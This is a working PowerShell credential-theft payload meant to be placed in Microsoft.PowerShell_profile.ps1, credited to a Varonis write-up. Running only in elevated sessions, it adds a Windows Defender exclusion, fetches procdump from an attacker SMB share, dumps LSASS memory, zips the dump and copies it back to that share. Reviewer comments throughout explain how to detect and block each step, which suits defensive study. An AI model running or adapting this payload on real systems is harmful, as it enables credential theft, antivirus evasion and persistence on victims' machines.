exfil LSASS dump via Microsoft.PowerShell_profile.ps1
# write-up: https://www.varonis.com/blog/author/tokyoneon/
#
# NOTE(review): this is a credential-theft payload. It dumps the memory of lsass.exe
# (which holds logon material for the current session) and copies the dump off-host
# over SMB. Placed in Microsoft.PowerShell_profile.ps1 it runs on every interactive
# PowerShell start that does not use -NoProfile, so the profile file itself is the
# persistence artefact to watch for. Controls that stop or surface each step are noted
# inline; in short: LSA Protection (RunAsPPL) / Credential Guard against the LSASS read,
# Defender Tamper Protection against the exclusion change, egress filtering of SMB
# (TCP 445) against the copy-out, and PowerShell script block logging (Event ID 4104)
# plus Sysmon ProcessAccess (Event ID 10) on lsass.exe for detection.
#
# an if statement to prevent the attack from executing without administrator privileges
# S-1-16-12288 is the "High" mandatory integrity label, so this passes only when the host
# process is already elevated (UAC-approved) - not merely when the account is in Administrators.
# The script silently does nothing in a non-elevated session.
if (whoami /groups | findstr /i "S-1-16-12288")
{
# start the attack as a background process to prevent the PS terminal from stalling when opened
# (Start-Job runs the block in a child PowerShell process; the block's text is presumably still
# captured by script block logging when that is enabled - confirm on the target build)
Start-Job {
# where to write data during the attack?
$temp = "$env:TEMP"
# create path exclusion in Windows Defender to prevent procdump detection
# Defender records the configuration change in its Operational event log (Event ID 5007),
# and Tamper Protection can block the change outright. An exclusion added for %TEMP% by a
# user process is a strong hunting signal on its own.
Add-MpPreference -ExclusionPath $temp
# sleep several seconds to allow the path exclusion to take effect
Start-Sleep -s 4
# the attacker's IP address
$server = "192.168.56.101"
# the attacker's SMB share name, must match impacket-smbserver share name
$share = "evilshare"
# procdump filename as it appears on the attacker's SMB share
$procdump = "procdump.exe"
# procdump.exe is saved locally with a random string as the filename
# (5 random ASCII letters + ".exe" in %TEMP%; the random name defeats filename-based blocking,
# but the file is still a signed Sysinternals binary, so hash / signer-based rules still match)
$filename = (-join ((65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object { [char]$_ })) + '.exe'
# the procdump output path when saved locally; shameless username plug
$dump = "tokyoneon.dmp"
# as the procdump output contains non-ascii characters, it must be compressed before exfiltrating
# (the resulting archive name embeds hostname and username, so "*-lsass.zip" is a usable IoC pattern)
$exfil = "$env:COMPUTERNAME-$env:USERNAME-lsass.zip"
# rather than use invoke-webrequest, use an alternate LOLBAS for file retrieval
# esentutl.exe copying from a UNC path (/y <src> /d <dst> /o) is a signed-binary
# download technique; esentutl reading a remote share is anomalous and worth alerting on.
esentutl.exe /y \\$server\$share\$procdump /d $temp\$filename /o
# execute procdump and dump LSASS memory
# "-ma lsass.exe" opens lsass.exe for a full memory read - the canonical Sysmon Event ID 10
# (ProcessAccess) detection. With LSA Protection (RunAsPPL) or Credential Guard enabled the
# dump fails or contains no usable secrets.
& $temp\$filename -accepteula -ma lsass.exe $temp\$dump
# suppress progress bar that appears in the terminal when compressing the dump
$ProgressPreference = "SilentlyContinue"
# compress the dump
Compress-Archive -Path $temp\$dump -DestinationPath $temp\$exfil -Force
# exfiltrate the compressed dump to the attacker's SMB share via cp
# Outbound SMB from a workstation to a non-file-server host is the network-level signal;
# blocking egress TCP 445 at the host firewall prevents this step. Note the dump and the
# archive are left behind in %TEMP% - useful forensic artefacts.
cp $temp\$exfil \\$server\$share\$exfil } | Out-Null
}